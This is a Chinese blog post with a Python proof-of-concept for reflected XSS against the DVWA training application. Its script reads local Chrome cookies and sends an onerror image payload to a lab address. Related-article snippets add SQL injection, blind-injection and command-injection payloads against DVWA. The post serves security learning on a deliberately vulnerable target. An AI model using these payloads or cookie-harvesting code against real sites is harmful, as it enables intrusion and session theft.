POC——DVWA‘s XSS Reflected

最新推荐文章于 2025-06-04 14:09:44 发布
最新推荐文章于 2025-06-04 14:09:44 发布
阅读量144 收藏 1
点赞数
分类专栏: POC 文章标签: xss python 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45260839/article/details/125360643
版权

XSS反射型中,三个等级内全都只定义了对<script>标签的过滤,所以通用一个<img>标签即可~

import requests
import browser_cookie3
from urllib import parse

cookie = browser_cookie3.chrome()
text1 = '<img src=1 onerror=alert(document.cookie)>'
string1 = parse.quote(text1)
url = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/xss_r/?name='+string1
response = requests.get(url=url,cookies=cookie)

re = 'document.cookie'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

此处没有必要一定要把请求url编码,在这里只是想加一下而已~

DVWA-xss详细讲解
qq_43395215的博客
05-08 1394
XSS,全称跨站脚本,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要修改的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 博客地址:http://soliym.top/ XSS分类: 反射型xss:只是简...
Kali linux 学习笔记(五十二)Web渗透——XSS 2020.3.30
闵行小鱼塘
03-30 789
学习XSS
DVWA--XSS详解
洋洋的小黑屋
12-29 8835
DVWAXSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。 DOM XSS:通过修改页面的D...
dvwa-xss
weixin_53627195的博客
02-17 1126
登陆后在DVWA Security模块设置等级为low本文中,使用同一个paylod就能通杀这三种xss,在文章最后还分享了其他的paylod,有兴趣可以尝试。
DVWA-XSS
m0_64037702的博客
07-13 767
XSS分为三类: 1.XSS (DOM) DOM型 2.XSS(Reflected) 反射型 3.XSS(Stored) 存储型1.XSS(DOM) 只能在前端触发,只能自己害自己“自我欺骗”。2.XSS(Reflected) 不进入数据库,通过生成的URL发送给对方,对方打开链接会看到你输入的内容。输入">显示xss 3.XSS(Stored) 能够进入对方数据库留下输入的内容等,对方每次打开网站都会看到不能被修改或者删除,永久留存。...
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 2870
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
XSS知识点
C_LCH_2000的博客
07-26 716
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。它是指 恶意攻击者将恶意的Script代码插入进Web页面中,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击。...
test xss
测试0901-1
11-04 226
目录 安装 克隆 安装模块 环境要求 python版本 操作系统 选项 帮助 添加目标url 单个 GET方法 POST方法 从文件 测试url路径组件 POST数据为json格式 爬取 默认 爬取深度 从文件读取payloads 查找隐藏参数 时间问题 线程数 超时 延迟 headers 盲注 有效负载编码 模糊测试 日志显示最低级别 跳过确认提示 跳过Dom扫描 更新 分析(DVWA不行) 是我打开方式不对吗?什么玩意呀(分析在最后)
DVWA练习记录
qq_41260930的博客
11-15 3103
文章目录1. DVWA通关记录1.1. 目的2. 练习(白盒测试)2.1. Brute Force(暴力破解)2.1.1. 原理2.1.2. LOW2.1.2.1. 查看源码2.1.2.2. SQL注入2.1.2.3. 工具爆破(BURPSUITE)2.1.3. MEDIUM2.1.3.1. 查看源码2.1.3.2. SQL注入2.1.3.3. 工具爆破(BURPSUITE)2.1.4. HIGH...
DVWA练习
bingo_csdn的博客
10-29 136
命令行注入(对命令行内容没有校验) 注释&;|-$()`|| &&空格 windows系列支持的管道符如下所示 |:直接执行后面的语句,如ping 127.0.0.1 | whoami ||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假,如ping 2 || whoami &:如果前面的语句为假则直接执行后面的语句,如ping 127.0.0.1 & whoami &&:如果前面的语句为假则直接出错,也不执行后面的语句,前面..
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 4025
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
网络安全——XSStrike中文手册【自学笔记】
yinjiyufei的博客
06-04 655
记录XSStrick中文手册【自学笔记】
网络攻击与防御-第三章 XSS漏洞
yescomecn的博客
10-20 1182
XSS 漏洞 0x01 什么是xss XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容 https://xz.aliyun.com/t/4507 https://prompt.ml/0 靶
pikachu靶场通关笔记13 XSS关卡09-XSS之href输出
mooyuan的网络安全博客
06-04 882
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS09关卡XSS之href输出的渗透部分。
pikachu靶场通关笔记11 XSS关卡07-XSS之关键字过滤绕过(三种方法渗透)
mooyuan的网络安全博客
06-03 916
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS原理并进行渗透实践,本文为XSS关卡第07关XSS过滤关卡的渗透部分。
XSS跨站脚本攻击
m0_63779088的博客
05-30 938
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站注入恶意脚本,使其在其他用户浏览器中执行。XSS分为三种类型:存储型(恶意脚本存储在服务器)、反射型(通过URL参数触发)和DOM型(纯客户端攻击)。攻击危害包括窃取敏感信息、会话劫持、伪造用户行为等。防范措施包括输入验证、输出编码、内容安全策略(CSP)、避免动态插入HTML、使用安全框架以及定期安全测试。开发者需综合运用这些技术,才能有效防护XSS攻击,保障网站和用户安全。
pikachu靶场通关笔记14 XSS关卡10-XSS之js输出(五种方法渗透)
mooyuan的网络安全博客
06-04 940
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文使用5种方法对XSS1第10关卡XSS之js输出进行渗透。
pikachu靶场通关笔记10 XSS关卡06-XSS之盲打
mooyuan的网络安全博客
06-02 929
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
渗透实战PortSwigger靶场:lab13存储型DOM XSS详解
最新发布
ericalezl的博客
06-04 78
存储型DOM XSS详解进来是需要留言的,先用做简单的 html 标签测试发现面的</h1>不见了数据包中找到了一个他是把用户输入的<>进行 html 编码,输入的<>当成字符串处理回显到页面中,看来只是把用户输入的第一个<>进行了编码构造也可以。
使用pocDVWA(security=low)进行sql注入和盲注攻击
07-12
DVWA(Damn Vulnerable Web Application)进行SQL注入和盲注攻击是为了演示和学习安全性问题,需要在合法授权和合规的环境下进行。以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入和盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" payload = "' OR '1'='1'-- " # 发送注入请求 response = requests.get(target_url + payload) # 判断注入是否成功 if "User ID exists in the database." in response.text: print("SQL注入成功!") else: print("SQL注入失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了SQL注入的技巧,目的是绕过原始查询条件,使查询结果始终为真。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断注入是否成功。 2. 盲注攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli_blind/" payload = "' OR substring((SELECT database()), 1, 1)='d'-- " # 发送盲注请求 response = requests.get(target_url + "?id=" + payload) # 判断盲注是否成功 if "User ID exists in the database." in response.text: print("盲注成功!") else: print("盲注失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了盲注的技巧,通过逐个查询数据库名称的字符,并通过判断响应内容来确定字符是否正确。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断盲注是否成功。 请注意,以上代码仅用于演示和学习目的,不得用于非法用途。在实际环境中进行安全测试时,请遵循合法和合规的规定,并获得合适的授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值